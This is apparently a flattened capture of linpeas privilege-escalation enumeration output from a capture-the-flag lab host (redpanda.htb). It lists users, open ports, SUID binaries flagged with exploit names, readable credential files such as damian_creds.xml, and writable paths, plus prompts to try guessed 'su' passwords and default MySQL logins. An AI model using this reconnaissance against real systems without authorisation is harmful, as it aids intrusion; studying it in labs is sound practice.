(activatable) - - - org.freedesktop.fwupd - - - (activatable) - - - org.freedesktop.hostname1 - - - (activatable) - - - org.freedesktop.locale1 - - - (activatable) - - - org.freedesktop.login1 738 systemd-logind root :1.7 systemd-logind.service - - org.freedesktop.network1 - - - (activatable) - - - org.freedesktop.resolve1 1090 systemd-resolve systemd-resolve :1.9 systemd-resolved.service - - org.freedesktop.systemd1 1 systemd root :1.4 init.scope - - org.freedesktop.thermald - - - (activatable) - - - org.freedesktop.timedate1 - - - (activatable) - - - org.freedesktop.timesync1 638 systemd-timesyn systemd-timesync :1.0 systemd-timesyncd.service - -╔═════════════════════╗ ════════════════════════════════════════╣ Network Information ╠════════════════════════════════════════ ╚═════════════════════╝ ╔══════════╣ Hostname, hosts and DNS redpanda 127.0.0.1 localhost redpanda.htb 127.0.1.1 redpanda::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allroutersnameserver 127.0.0.53 options edns0 trust-ad╔══════════╣ Interfaces # symbolic names for networks, see networks(5) for more information link-local 169.254.0.0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500inet 10.10.11.170 netmask 255.255.254.0 broadcast 10.10.11.255inet6 fe80::250:56ff:feb9:f29 prefixlen 64 scopeid 0x20<link>inet6 dead:beef::250:56ff:feb9:f29 prefixlen 64 scopeid 0x0<global>ether 00:50:56:b9:0f:29 txqueuelen 1000 (Ethernet)RX packets 195187 bytes 23219352 (23.2 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 129002 bytes 16878815 (16.8 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536inet 127.0.0.1 netmask 255.0.0.0inet6 ::1 prefixlen 128 scopeid 0x10<host>loop txqueuelen 1000 (Local Loopback)RX packets 17246 bytes 2153061 (2.1 MB)RX errors 0 dropped 0 overruns 0 frame 0TX packets 17246 bytes 2153061 (2.1 MB)TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::8080 :::* LISTEN 883/java ╔══════════╣ Can I sniff with tcpdump? No ╔═══════════════════╗ ═════════════════════════════════════════╣ Users Information ╠═════════════════════════════════════════ ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#users uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk) ╔══════════╣ Do I have PGP keys? /usr/bin/gpg netpgpkeys Not Found netpgp Not Found ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2 [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo;unix-group:admin╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console root:x:0:0:root:/root:/bin/bash woodenk:x:1000:1000:,,,:/home/woodenk:/bin/bash╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network) uid=1000(woodenk) gid=1000(woodenk) groups=1000(woodenk) uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve) uid=102(systemd-timesync) gid=104(systemd-timesync) groups=104(systemd-timesync) uid=103(messagebus) gid=106(messagebus) groups=106(messagebus) uid=104(syslog) gid=110(syslog) groups=110(syslog),4(adm),5(tty) uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=106(tss) gid=111(tss) groups=111(tss) uid=107(uuidd) gid=112(uuidd) groups=112(uuidd) uid=108(tcpdump) gid=113(tcpdump) groups=113(tcpdump) uid=109(landscape) gid=115(landscape) groups=115(landscape) uid=110(pollinate) gid=1(daemon[0m) groups=1(daemon[0m) uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=112(usbmux) gid=46(plugdev) groups=46(plugdev) uid=113(mysql) gid=118(mysql) groups=118(mysql) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=998(lxd) gid=100(users) groups=100(users) uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)╔══════════╣ Login now11:32:52 up 2:31, 0 users, load average: 0.13, 0.06, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT╔══════════╣ Last logons woodenk pts/2 Mon Sep 12 09:30:06 2022 - Mon Sep 12 09:34:31 2022 (00:04) 10.10.16.9 woodenk pts/1 Mon Sep 12 09:28:47 2022 - Mon Sep 12 09:34:31 2022 (00:05) 10.10.16.9 reboot system boot Mon Sep 12 09:00:57 2022 still running 0.0.0.0 woodenk pts/0 Tue Jul 5 05:51:25 2022 - Tue Jul 5 05:53:14 2022 (00:01) 10.10.14.23 reboot system boot Tue Jul 5 05:49:47 2022 - Tue Jul 5 05:53:16 2022 (00:03) 0.0.0.0 root tty1 Thu Jun 30 13:17:41 2022 - down (00:00) 0.0.0.0 reboot system boot Thu Jun 30 13:17:15 2022 - Thu Jun 30 13:18:04 2022 (00:00) 0.0.0.0wtmp begins Thu Jun 30 13:17:15 2022╔══════════╣ Last time logon each user Username Port From Latest root tty1 Thu Jun 30 13:17:41 +0000 2022 woodenk pts/2 10.10.16.9 Mon Sep 12 09:30:06 +0000 2022╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!╔══════════════════════╗ ═══════════════════════════════════════╣ Software Information ╠═══════════════════════════════════════ ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /usr/bin/nc /usr/bin/netcat /usr/bin/perl /usr/bin/ping /usr/bin/python3 /usr/bin/sudo /usr/bin/wget╔══════════╣ Installed Compilers╔══════════╣ MySQL version mysql Ver 8.0.29-0ubuntu0.20.04.3 for Linux on x86_64 ((Ubuntu)) ═╣ MySQL connection using default root/root ........... No ═╣ MySQL connection using root/toor ................... No ═╣ MySQL connection using root/NOPASS ................. No ╔══════════╣ Searching mysql credentials and exec From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user = mysql Found readable /etc/mysql/my.cnf !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mysql.conf.d/╔══════════╣ Analyzing MariaDB Files (limit 70)-rw------- 1 root root 317 Jun 14 11:54 /etc/mysql/debian.cnf╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 1044 Feb 7 2022 /usr/share/doc/rsync/examples/rsyncd.conf [ftp]comment = public archivepath = /var/www/pubuse chroot = yeslock file = /var/lock/rsyncdread only = yeslist = yesuid = nobodygid = nogroupstrict modes = yesignore errors = noignore nonreadable = yestransfer logging = notimeout = 600refuse options = checksum dry-rundont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz╔══════════╣ Analyzing Ldap Files (limit 70) The password hash is from the {SSHA} to 'structural' drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/ldap╔══════════╣ Searching ssl/ssh files PermitRootLogin yes ChallengeResponseAuthentication no UsePAM yes PasswordAuthentication yes ══╣ Some certificates were found (out limited): /etc/pki/fwupd-metadata/LVFS-CA.pem /etc/pki/fwupd/LVFS-CA.pem /etc/pollinate/entropy.ubuntu.com.pem /var/lib/fwupd/pki/client.pem 7178PSTORAGE_CERTSBINgpg-connect-agent: no running gpg-agent - starting '/usr/bin/gpg-agent' gpg-connect-agent: waiting for the agent to come up ... (5s) gpg-connect-agent: connection to agent established ══╣ Some home ssh config file was found /usr/share/openssh/sshd_config Include /etc/ssh/sshd_config.d/*.conf ChallengeResponseAuthentication no UsePAM yes X11Forwarding yes PrintMotd no AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Include /etc/ssh/ssh_config.d/*.conf Host *SendEnv LANG LC_*HashKnownHosts yesGSSAPIAuthentication yes╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Jun 14 14:35 /etc/pam.d -rw-r--r-- 1 root root 2133 Feb 26 2020 /etc/pam.d/sshd╔══════════╣ Searching tmux sessions ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions tmux 3.0a /tmp/tmux-1000 ╔══════════╣ Analyzing Keyring Files (limit 70) drwxr-xr-x 2 root root 4096 Jul 5 05:52 /usr/share/keyrings ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd passwd file: /usr/share/lintian/overrides/passwd╔══════════╣ Analyzing PGP-GPG Files (limit 70) /usr/bin/gpg netpgpkeys Not Found netpgp Not Found -rw-r--r-- 1 root root 2796 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg -rw-r--r-- 1 root root 2794 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg -rw-r--r-- 1 root root 1733 Mar 29 2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg -rw-r--r-- 1 root root 3267 Jan 6 2021 /usr/share/gnupg/distsigkey.gpg -rw-r--r-- 1 root root 2247 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-cc-eal.gpg -rw-r--r-- 1 root root 2274 Jan 25 2021 /usr/share/keyrings/ubuntu-advantage-cis.gpg -rw-r--r-- 1 root root 2236 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-apps.gpg -rw-r--r-- 1 root root 2264 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-esm-infra-trusty.gpg -rw-r--r-- 1 root root 2275 Oct 15 2020 /usr/share/keyrings/ubuntu-advantage-fips.gpg -rw-r--r-- 1 root root 2250 Apr 15 14:10 /usr/share/keyrings/ubuntu-advantage-realtime-kernel.gpg -rw-r--r-- 1 root root 2235 Apr 1 13:27 /usr/share/keyrings/ubuntu-advantage-ros.gpg -rw-r--r-- 1 root root 7399 Sep 17 2018 /usr/share/keyrings/ubuntu-archive-keyring.gpg -rw-r--r-- 1 root root 6713 Oct 27 2016 /usr/share/keyrings/ubuntu-archive-removed-keys.gpg -rw-r--r-- 1 root root 4097 Feb 6 2018 /usr/share/keyrings/ubuntu-cloudimage-keyring.gpg -rw-r--r-- 1 root root 0 Jan 17 2018 /usr/share/keyrings/ubuntu-cloudimage-removed-keys.gpg -rw-r--r-- 1 root root 1227 May 27 2010 /usr/share/keyrings/ubuntu-master-keyring.gpg -rw-r--r-- 1 root root 2867 Feb 13 2020 /usr/share/popularity-contest/debian-popcon.gpg╔══════════╣ Analyzing Cache Vi Files (limit 70) -rw-r--r-- 1 root root 12288 Jun 20 14:05 /opt/panda_search/target/classes/static/css/.main.css.swp -rw-r--r-- 1 root root 12288 Apr 26 11:33 /opt/panda_search/target/classes/templates/.search.html.swp -rw-r--r-- 1 root root 12288 Apr 25 09:28 /opt/panda_search/target/classes/templates/.stats.html.swp╔══════════╣ Kubernetes information╔══════════╣ Analyzing Bind Files (limit 70) -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind╔══════════╣ Analyzing Windows Files Files (limit 70) lrwxrwxrwx 1 root root 20 Jun 14 11:54 /etc/alternatives/my.cnf -> /etc/mysql/mysql.cnf lrwxrwxrwx 1 root root 24 Jun 14 11:54 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf -rw-r--r-- 1 root root 81 Jun 14 11:54 /var/lib/dpkg/alternatives/my.cnf╔══════════╣ Analyzing Other Interesting Files Files (limit 70) -rw-r--r-- 1 root root 3771 Feb 25 2020 /etc/skel/.bashrc -rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 /home/woodenk/.bashrc -rw-r--r-- 1 root root 807 Feb 25 2020 /etc/skel/.profile -rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 /home/woodenk/.profile╔═══════════════════╗ ═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════ ╚═══════════════════╝ ╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid strings Not Found -rwsr-xr-- 1 root messagebus 51K Apr 29 12:03 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 23K Feb 21 2022 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 463K Mar 30 13:03 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 55K Feb 7 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 163K Jan 19 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable -rwsr-xr-x 1 root root 87K Mar 14 08:26 /usr/bin/gpasswd -rwsr-xr-x 1 root root 39K Feb 7 2022 /usr/bin/umount ---> BSD/Linux(08-1996) -rwsr-xr-x 1 root root 67K Mar 14 08:26 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997) -rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount -rwsr-xr-x 1 root root 52K Mar 14 08:26 /usr/bin/chsh -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwsr-xr-x 1 root root 84K Mar 14 08:26 /usr/bin/chfn ---> SuSE_9.3/10 -rwsr-xr-x 1 root root 44K Mar 14 08:26 /usr/bin/newgrp ---> HP-UX_10.20 -rwsr-xr-x 1 root root 67K Feb 7 2022 /usr/bin/su╔══════════╣ SGID ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid -rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/pam_extrausers_chkpwd -rwxr-sr-x 1 root shadow 43K Sep 17 2021 /usr/sbin/unix_chkpwd -rwxr-sr-x 1 root utmp 15K Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter -rwxr-sr-x 1 root tty 35K Feb 7 2022 /usr/bin/wall -rwxr-sr-x 1 root ssh 343K Mar 30 13:03 /usr/bin/ssh-agent -rwxr-sr-x 1 root shadow 31K Mar 14 08:26 /usr/bin/expiry -rwxr-sr-x 1 root tty 15K Mar 30 2020 /usr/bin/bsd-write -rwxr-sr-x 1 root shadow 83K Mar 14 08:26 /usr/bin/chage -rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614) -rwxr-sr-x 1 root crontab 43K Feb 13 2020 /usr/bin/crontab╔══════════╣ Checking misconfigurations of ld.so ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so /etc/ld.so.conf include /etc/ld.so.conf.d/*.conf/etc/ld.so.conf.d/etc/ld.so.conf.d/libc.conf /usr/local/lib/etc/ld.so.conf.d/x86_64-linux-gnu.conf /usr/local/lib/x86_64-linux-gnu /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu╔══════════╣ Capabilities ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities Current capabilities: Current: = CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000Shell capabilities: 0x0000000000000000= CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000Files with capabilities (limited to 50): /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/ping = cap_net_raw+ep /usr/bin/mtr-packet = cap_net_raw+ep /usr/bin/traceroute6.iputils = cap_net_raw+ep╔══════════╣ Users with capabilities ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities ╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls files with acls in searched folders Not Found ╔══════════╣ .sh files in path ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path /usr/bin/gettext.sh /usr/bin/rescan-scsi-bus.sh╔══════════╣ Unexpected in root /credits ╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files total 32 drwxr-xr-x 2 root root 4096 Jun 14 14:35 . drwxr-xr-x 105 root root 4096 Jul 5 05:52 .. -rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh -rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh -rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh -rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh -rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh -rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d ═╣ Hashes inside passwd file? ........... No ═╣ Writable passwd file? ................ No ═╣ Credentials in fstab/mtab? ........... No ═╣ Can I read shadow files? ............. No ═╣ Can I read shadow plists? ............ No ═╣ Can I write shadow plists? ........... No ═╣ Can I read opasswd file? ............. No ═╣ Can I write in network-scripts? ...... No ═╣ Can I read root folder? .............. No ╔══════════╣ Searching root files in home dirs (limit 30) /home/ /home/woodenk/.bash_history /home/woodenk/user.txt /root/╔══════════╣ Searching folders owned by me containing others files on it (limit 100) /home/woodenk ╔══════════╣ Readable files belonging to root and readable by me but not world readable -rw-r----- 1 root logs 422 Sep 12 10:42 /credits/damian_creds.xml -rw-r----- 1 root logs 426 Sep 12 10:54 /credits/woodenk_creds.xml -rw-r----- 1 root woodenk 33 Sep 12 09:01 /home/woodenk/user.txt╔══════════╣ Modified interesting files in the last 5mins (limit 100) /opt/panda_search/redpanda.log /tmp/hsperfdata_woodenk/883 /home/woodenk/.gnupg/pubring.kbx /home/woodenk/.gnupg/trustdb.gpg /var/log/syslog /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/system.journal /var/log/journal/8e7b2e7692df48faa4e42d6cfc791ed2/user-1000.journal /var/log/auth.log╔══════════╣ Writable log files (logrotten) (limit 100) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation logrotate 3.14.0 Default mail command: /usr/bin/mailDefault compress command: /bin/gzipDefault uncompress command: /bin/gunzipDefault compress extension: .gzDefault state file path: /var/lib/logrotate/statusACL support: yesSELinux support: yes╔══════════╣ Files inside /home/woodenk (limit 20) total 796 drwxr-xr-x 6 woodenk woodenk 4096 Sep 12 11:32 . drwxr-xr-x 3 root root 4096 Jun 14 14:35 .. lrwxrwxrwx 1 root root 9 Jun 14 11:38 .bash_history -> /dev/null -rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 .bash_logout -rw-r--r-- 1 woodenk woodenk 3938 Jun 14 12:37 .bashrc drwx------ 2 woodenk woodenk 4096 Jun 23 19:04 .cache drwx------ 3 woodenk logs 4096 Sep 12 11:32 .gnupg drwxrwxr-x 3 woodenk woodenk 4096 Jun 14 14:35 .local drwxrwxr-x 4 woodenk woodenk 4096 Jun 14 14:35 .m2 -rw-r--r-- 1 woodenk woodenk 807 Jun 14 11:12 .profile -rwxrw-r-- 1 woodenk logs 770491 Jul 1 10:40 linpeas.sh -rw-r----- 1 root woodenk 33 Sep 12 09:01 user.txt╔══════════╣ Files inside others home (limit 20)╔══════════╣ Searching installed mail applications╔══════════╣ Mails (limit 50)╔══════════╣ Backup folders╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 3696 Jun 20 15:58 /opt/credit-score/LogParser/final/pom.xml.bak -rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old -rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz -rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz -rw-r--r-- 1 root root 11886 Jun 14 12:58 /usr/share/info/dir.old -rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/wm831x/backup.h -rw-r--r-- 1 root root 0 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 237986 Jun 15 13:13 /usr/src/linux-headers-5.4.0-121-generic/.config.old -rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-121/tools/testing/selftests/net/tcp_fastopen_backup_key.sh -rw-r--r-- 1 root root 44048 Oct 12 2021 /usr/lib/x86_64-linux-gnu/open-vm-tools/plugins/vmsvc/libvmbackup.so -rw-r--r-- 1 root root 9833 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/power/supply/wm831x_backup.ko -rw-r--r-- 1 root root 9073 Jun 15 13:13 /usr/lib/modules/5.4.0-121-generic/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 1802 Feb 15 2022 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py -rw-r--r-- 1 root root 1413 Jun 14 12:58 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc -rw-r--r-- 1 root root 39448 May 4 12:36 /usr/lib/mysql/plugin/component_mysqlbackup.so -rw-r--r-- 1 root root 2743 Apr 23 2020 /etc/apt/sources.list.curtin.old╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found: /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001 Found: /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001 Found: /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)╔══════════╣ Web files?(output limit)╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/static/img/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/resources/templates/.DS_Store -rw-rw-r-- 1 root root 6148 Dec 14 2021 /opt/panda_search/src/main/.DS_Store -rw-r--r-- 1 root root 2047 Apr 23 13:02 /usr/lib/jvm/.java-1.11.0-openjdk-amd64.jinfo -rw-r--r-- 1 woodenk woodenk 220 Jun 14 11:12 /home/woodenk/.bash_logout -rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout -rw------- 1 root root 0 Apr 23 2020 /etc/.pwd.lock -rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.system.lock -rw-r--r-- 1 root root 0 Jun 14 12:04 /etc/.java/.systemPrefs/.systemRootModFile -rw-r--r-- 1 landscape landscape 0 Apr 23 2020 /var/lib/landscape/.cleanup.user -rw-r--r-- 1 root root 0 Sep 12 09:01 /run/network/.ifstate.lock╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) -rwxrwxr-x 1 woodenk logs 765823 Sep 12 11:29 /tmp/hsperfdata_woodenk/linpeas.sh -rw------- 1 woodenk logs 32768 Sep 12 11:32 /tmp/hsperfdata_woodenk/883 -rw-r--r-- 1 root root 39509 Jul 5 05:52 /var/backups/apt.extended_states.0 -rw-r--r-- 1 root root 4206 Jun 14 14:30 /var/backups/apt.extended_states.1.gz -rw-r--r-- 1 root root 677272 Jun 14 14:30 /var/backups/dpkg.status.0 -rw-r--r-- 1 root root 268 May 7 2020 /var/backups/dpkg.diversions.0 -rw-r--r-- 1 root root 81920 Jun 17 06:25 /var/backups/alternatives.tar.0 -rw-r--r-- 1 root root 100 Apr 23 2020 /var/backups/dpkg.statoverride.0╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files /dev/mqueue /dev/shm /home/woodenk /opt/panda_search/src/main/resources/static/css/panda.css /opt/panda_search/target/classes/static/css/panda.css /opt/panda_search/target/panda.css.map /run/lock /run/screen /tmp /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix #)You_can_write_even_more_files_inside_last_directory/tmp/hsperfdata_woodenk/883 /tmp/hsperfdata_woodenk/linpeas.sh /tmp/tmux-1000 /tmp/tomcat-docbase.8080.3786991954686091370 /tmp/tomcat.8080.1605307941942746866 /tmp/tomcat.8080.1605307941942746866/work /tmp/tomcat.8080.1605307941942746866/work/Tomcat /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT /var/crash /var/tmp╔══════════╣ Interesting GROUP writable files (not in Home) (max 500) ╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files Group logs: /opt/panda_search/redpanda.log /tmp/hsperfdata_woodenk/linpeas.sh /tmp/tomcat.8080.1605307941942746866/work /tmp/tomcat.8080.1605307941942746866/work/Tomcat /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost /tmp/tomcat.8080.1605307941942746866/work/Tomcat/localhost/ROOT╔══════════╣ Searching passwords in history files╔══════════╣ Searching *password* or *credential* files in home (limit 70) /etc/pam.d/common-password /usr/bin/systemd-ask-password /usr/bin/systemd-tty-ask-password-agent /usr/lib/git-core/git-credential /usr/lib/git-core/git-credential-cache /usr/lib/git-core/git-credential-cache--daemon /usr/lib/git-core/git-credential-store#)There are more creds/passwds files in the previous parent folder/usr/lib/grub/i386-pc/password.mod /usr/lib/grub/i386-pc/password_pbkdf2.mod /usr/lib/mysql/plugin/component_validate_password.so /usr/lib/mysql/plugin/validate_password.so /usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/keyring/credentials.py /usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/credentials.py /usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc /usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py /usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py /usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc /usr/lib/python3/dist-packages/twisted/cred/credentials.py /usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path /usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.path /usr/lib/systemd/system/systemd-ask-password-console.service /usr/lib/systemd/system/systemd-ask-password-plymouth.path /usr/lib/systemd/system/systemd-ask-password-plymouth.service#)There are more creds/passwds files in the previous parent folder/usr/share/doc/git/contrib/credential 